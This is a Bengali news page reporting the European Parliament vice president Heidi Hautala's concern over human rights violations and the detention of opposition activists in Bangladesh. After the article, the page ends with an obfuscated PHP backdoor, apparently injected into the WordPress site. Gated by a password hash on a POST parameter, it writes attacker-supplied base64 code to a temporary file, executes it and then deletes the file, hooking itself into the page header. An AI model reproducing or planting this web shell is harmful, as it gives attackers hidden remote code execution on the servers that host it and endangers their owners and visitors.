সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

বাংলাদেশে ‘মানবাধিকার লঙ্ঘনে’ উদ্বেগ ইইউ পার্লামেন্টের ভাইস প্রেসিডেন্টের

news-image

নিউজ ডেস্ক : বাংলাদেশে ‘মানবাধিকার লঙ্ঘন’ এবং সেই সঙ্গে বিরোধী রাজনৈতিক নেতাকর্মীদের ‘দমন পীড়নের’ ঘটনায় উদ্বেগ প্রকাশ করেছেন ইউরোপীয় পার্লামেন্টের ভাইস প্রেসিডেন্ট হেইদি হাউতালা।

শুক্রবার এক বিবৃতিতে এই উদ্বেগের কথা জানান তিনি।

হেইদি বলেন, বাংলাদেশে উদ্বেগজনকহারে যেভাবে মানবাধিকার লঙ্ঘিত হচ্ছে এবং সুশীল সমাজের বর্তমান যে পরিস্থিতি তা নিয়ে আমি উদ্বিগ্ন।

৬২ বছর বয়সী ফিনল্যান্ডের এই নারী নেত্রী তৃতীয়বারের মতো ইউরোপীয় পার্লামেন্টে প্রতিনিধিত্ব করছেন।
এর আগে ২০০৯ থেকে দুই বছরের জন্য ইউরোপীয় পার্লামেন্টের মানবাধিকার বিষয়ক উপ-কমিটির সভাপতি ছিলেন তিনি। ফিনল্যান্ড পার্লামেন্টের ২০০৯ সাল পর্যন্ত টানা ছয় বছরের জন্য সংসদ সদস্য ছিলেন হেইদি হাউতালা। বিবৃতিতে তিনি বিরোধী দলের রাজবন্দিদের মৃক্তিরর আহ্বানও জানান।

বিবৃতিতে হেইদি বলেন, রাজনৈতিক কারণে বিরোধী দলের যেসব নেতাকর্মীদের বন্দি করে রাখা হয়েছে তাদের মুক্তি দেওয়ার আহ্বান জানাচ্ছি।

এর আগে মানবাধিকার পরিস্থিতি নিয়ে যুক্তরাষ্ট্রের বার্ষিক প্রতিবেদনেও উদ্বেগের কথা উঠে এসেছে। ওই প্রতিবেদনে বিচারবহির্ভূত হত্যা, নির্যাতন, রাজনৈতিক বন্দির ঘটনা, গুমের মতো ঘটনাগুলো তুলে ধরা হয়।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}